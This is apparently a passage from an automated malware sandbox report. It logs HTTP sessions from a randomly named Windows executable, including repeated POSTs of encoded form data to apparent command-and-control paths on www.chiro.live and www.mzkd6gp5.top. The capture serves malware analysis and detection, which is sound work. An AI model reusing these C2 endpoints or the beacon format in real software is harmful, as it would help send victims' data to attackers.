                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:33.953973055 CET | 1289 | IN | Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                    Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                    Jan 9, 2025 16:57:33.954088926 CET | 1289 | IN | Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                    Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                    Jan 9, 2025 16:57:33.954170942 CET | 1289 | IN | Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                    Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                    Jan 9, 2025 16:57:33.954265118 CET | 661 | IN | Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                    Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                    Jan 9, 2025 16:57:33.954273939 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    54 | 192.168.11.30 | 49879 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:39.122222900 CET | 793 | OUT | POST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                                                                                    Jan 9, 2025 16:57:39.268029928 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:39 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 da 30 10 bd e7 57 b8 3e 64 da 99 e2 2f 20 40 63 a7 93 50 3e eb 40 42 48 0c 5c 32 b2 a4 20 39 b2 e4 da b2 0d e9 f4 bf d7 c6 9d e0 0e 3d 54 07 4b bb de 7d bb ef ad 64 7f f8 36 ef 2f d7 77 03 85 c8 90 5d 9d d9 e5 a6 30 c0 b7 8e 8a b9 7a 75 a6 14 cb 26 18 a0 ea 78 30 43 2c 81 02 09 88 13 2c 1d f5 71 39 6c 74 ff 44 1e 7f 13 29 a3 06 fe 91 d2 cc 51 77 8d 14 34 a0 08 23 20 a9 cf b0 aa 40 c1 25 e6 45 ee 64 e0 60 b4 c5 27 d9 1c 84 d8 51 33 8a f3 48 c4 b2 96 90 53 24 89 83 70 46 21 6e 1c 8c cf 0a e5 54 52 c0 1a 09 04 0c 3b a6 66 d4 e1 24 95 0c 5f d9 7a b5 1f e8 1c 9a e4 22 81 31 8d e4 91 d6 bf 7b 8f f1 4b 8c 13 52 6b c1 b8 4c 63 e6 94 fc be e8 7a 9e e7 1d 43 83 84 c6 42 63 34 c3 ba aa e8 47 48 5b 3f 2d 63 1f d4 ab cb 73 5a a2 fd 7f 25 6c fd 38 18 db 17 68 af 08 ce 04 40 8e 8a c4 73 75 fc f8 a9 2e 46 45 59 91 fb a8 50 57 e2 9d d4 03 90 81 ca 5b 8b 2b 95 78 49 39 94 54 70 a5 06 a5 fc 7c d7 af 0c 29 57 4e 39 12 b9 26 45 a4 31 01 8b f9 0a ae 91 82 90 e2 28 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0W>d/ @cP>@BH\2 9=TK}d6/w]0zu&x0C,,q9ltD)Qw4# @%Ed`'Q3HS$pF!nTR;f$_z"1{KRkLczCBc4GH[?-csZ%l8h@su.FEYPW[+xI9Tp|)WN9&E1(Q@Az_cIISh5VF\; &OM95Wz5p?'Of5e@E>5Qg">f#2V8,nI `x|Bx3F,iUedE[dn;br!ZCx$1C]{Cy8js/-i7t`4LLzVzt~[^^.u0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    55 | 192.168.11.30 | 49880 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:41.808381081 CET | 813 | OUT | POST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 30 44 71 6c 53 7a 71 2f 32 32 6c 6b 67 7a 42 7a 78 53 6b 49 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrY0DqlSzq/22lkgzBzxSkI=
                                                                                    Jan 9, 2025 16:57:41.953916073 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:41 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 36 c6 5f 0d a4 93 b8 f1 57 89 9d 38 4e 00 5f 32 42 52 2c 11 21 51 10 60 a7 d3 ff 5e 30 9d 98 8e 7b a8 0e 48 bb ec be dd f7 56 32 3f 7c 5b 8e d6 de dd 8d 42 64 c8 2e cf cc 72 53 18 e0 5b 4b c5 5c bd 3c 53 8a 65 12 0c 50 75 3c 98 21 96 40 81 04 c4 09 96 96 fa b8 1e 37 06 7f 22 8f bf 89 94 51 03 ff 48 69 66 a9 bb 46 0a 1a 50 84 11 90 d4 67 58 55 a0 e0 12 f3 22 77 76 63 61 b4 c5 27 d9 1c 84 d8 52 33 8a f3 48 c4 b2 96 90 53 24 89 85 70 46 21 6e 1c 8c cf 0a e5 54 52 c0 1a 09 04 0c 5b ed 66 ab 0e 27 a9 64 f8 d2 d4 aa fd 40 e7 d0 24 17 09 8c 69 24 8f b4 fe dd 7b 8c 5f 62 9c 90 5a 0b ad 8b 34 66 56 c9 ef 8b a6 e5 79 de 6f 35 21 a1 b1 68 32 9a 61 4d 55 b4 23 a4 a9 9d 96 31 0f ea d5 e5 39 2d d1 fd bf 12 a6 76 1c 8c e9 0b b4 57 04 67 02 20 4b 45 e2 b9 3a 7e fc 54 17 a3 a2 ac c8 7d 54 a8 2b f1 4e 6a 01 c8 40 e5 ad c5 95 4a bc a4 1c 4a 2a b8 52 83 52 7e be eb 57 86 94 2b a7 1c 89 bc 29 45 d4 64 02 16 f3 15 bc 49 0a 42 8a [TRUNCATED]
                                                                                    Data Ascii: 265SMs0WPv66_W8N_2BR,!Q`^0{HV2?|[Bd.rS[K\<SePu<!@7"QHifFPgXU"wvca'R3HS$pF!nTR[f'd@$i${_bZ4fVyo5!h2aMU#19-vWg KE:~T}T+Nj@JJ*RR~W+)EdIBG9~FV<HORdbx-^u.$36_^Q[:+sl4;0|7AZMW2A;\3;E(|Gd0pEq[@lg|>G;pMXQ;y?a"_72<i'vdtuxFlOvaHrwJ5s/7.d8}[_nZZyS^ou??0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    56 | 192.168.11.30 | 49881 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:44.496201992 CET | 2578 | OUT | POST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 2b 6a 64 54 79 51 47 61 42 2f 73 4a 36 59 36 79 6a 74 35 62 64 59 64 6b 34 46 75 6b 4c 63 30 6f 50 6c 48 39 31 36 34 4d 75 59 7a 6e 66 64 45 6d 7a 54 75 30 49 32 75 75 58 4d 4d 58 4d 5a 70 51 36 4f 71 63 2b 53 41 4f 6b 67 2f 30 41 6a 63 46 49 69 44 6d 61 39 4f 4c 4e 65 76 6b 39 41 56 42 46 74 53 33 35 72 49 4d 4d 77 79 4d 53 31 52 58 77 48 79 46 5a 70 34 62 4b 49 4f 4e 4c 4b 6b 73 61 79 52 66 59 4b 6d 56 35 36 77 58 55 6e 62 51 4a 46 62 5a 68 71 44 34 78 44 4b 61 6b 56 73 52 67 2b 73 78 56 6b 52 47 5a 65 35 73 4e 4b 50 78 65 53 64 7a 4a 61 5a 70 7a 74 4a 6d 54 56 62 54 63 6b 4f [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F= [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:44.496234894 CET | 1352 | OUT | Data Raw: 41 35 47 30 66 67 50 53 73 70 63 31 44 36 64 52 6f 72 76 48 32 53 4d 78 6c 69 35 6a 6f 6c 79 65 74 66 5a 72 52 56 56 2f 6d 2f 64 6c 63 4a 33 54 61 6b 4b 4c 48 73 44 34 68 2f 75 4a 66 43 74 4d 4e 4c 4c 77 63 38 38 49 4b 5a 4d 6d 67 66 73 76 30 4c
                                                                                    Data Ascii: A5G0fgPSspc1D6dRorvH2SMxli5jolyetfZrRVV/m/dlcJ3TakKLHsD4h/uJfCtMNLLwc88IKZMmgfsv0L8dD2Emfr+ERRNBTCf2YxjcCc89VTHbTWL7aJB7YUROfOM3WZYpbT/1vA+Yzwwk+zNW2qGMVeg/yoVhvR1ZG5fjAglKX9ZfJ7La9HAARWKC1GkF2RQrBj6ekVea2PZQOtGp4VJhNItnXr05hPgNw99ho9fs9llBTvP
                                                                                    Jan 9, 2025 16:57:44.641789913 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:44 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 1b 9c d8 6e 20 9d c4 8d bf 4a ec c4 71 02 f8 92 11 92 62 89 08 89 82 00 3b 9d fe f7 82 e9 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 f5 e1 db 62 b8 f2 ef 6e 14 22 23 76 79 62 55 9b c2 00 df d8 2a e6 ea e5 89 52 2e 8b 60 80 ea e3 de 8c b0 04 0a 24 20 49 b1 b4 d5 c7 d5 a8 d5 ff 13 79 f8 4d a4 8c 5b f8 47 46 73 5b dd b6 32 d0 82 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 d3 1b 1b a3 0d 3e ca e6 20 c2 b6 9a 53 5c c4 22 91 8d 84 82 22 49 6c 84 73 0a 71 6b 6f 7c 56 28 a7 92 02 d6 4a 21 60 d8 ee 68 ed 26 9c a4 92 e1 4b 4b af f7 3d 9d 7d 93 5c a4 30 a1 b1 3c d0 fa 77 ef 09 7e 49 70 4a 1a 2d b4 2f b2 84 d9 15 bf 2f ba 5e 14 45 af ad 41 42 13 a1 31 9a 63 5d 55 f4 03 a4 a5 1f 97 b1 f6 ea 35 e5 39 2e 71 f6 7f 25 2c fd 30 18 2b 10 68 a7 08 ce 04 40 b6 8a c4 73 7d fc f8 a9 29 46 4d 59 91 bb b8 54 57 e2 ad d4 43 90 83 da db 88 ab 94 78 c9 38 94 54 70 a5 01 a5 fc 7c d7 af 0a a9 56 41 39 12 85 26 45 ac 31 01 cb f9 0a ae 91 92 90 62 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPvn Jqb;tCu@ebn"#vybU*R.`$ IyM[GFs[2"> S\""Ilsqko|V(J!`h&KK=}\0<w~IpJ-//^EAB1c]U59.q%,0+h@s})FMYTWCx8Tp|VA9&E1b+A@a_79ey5yWk~4{FTHglRf:+{3wpa,Dfmc=#x8<\{i(6SdxrR-s,[e7p`B[.{]cd/1:dm<xpwg{(wlq\([rGYCa9l^5_7W7|J%0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    57 | 192.168.11.30 | 49882 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:47.176954031 CET | 533 | OUT | GET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:47.321386099 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:47 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    connection: close
                                                                                    Data Raw: 34 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                                    Data Ascii: 49D<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICI2Qi1sN0Y9bmJFYjZCYXBqckNZZDN2dUVrNjhkUkxZNHVhMk1vODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tUVDlSSGNsdHVDQUFBazUxSjQ9Jjgwaz1sUmFwQ1BNWGdEayIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7 [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:47.321394920 CET | 60 | IN | Data Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: ; } </script> </body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    58 | 192.168.11.30 | 49883 | 104.21.32.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:52.471359015 CET | 799 | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 59 2b 49 76 6a 57 45 41 63 36 54 75 4a 64 4d 34 50 46 54 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoY+IvjWEAc6TuJdM4PFTHw==
                                                                                    Jan 9, 2025 16:57:53.012433052 CET | 820 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQAztm%2Busp1qpHvsfHfUeQwzc%2BafZQwG06p1eq8mBC4xyYIQJfAJ4ThgRrm%2FdwRG%2FMn5NfemRFQF3LcW7naKbWG1FdOVeJREGAgxB9ofgZmxJabJc1qIVnc%2BHP0JK7I5U2Y8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
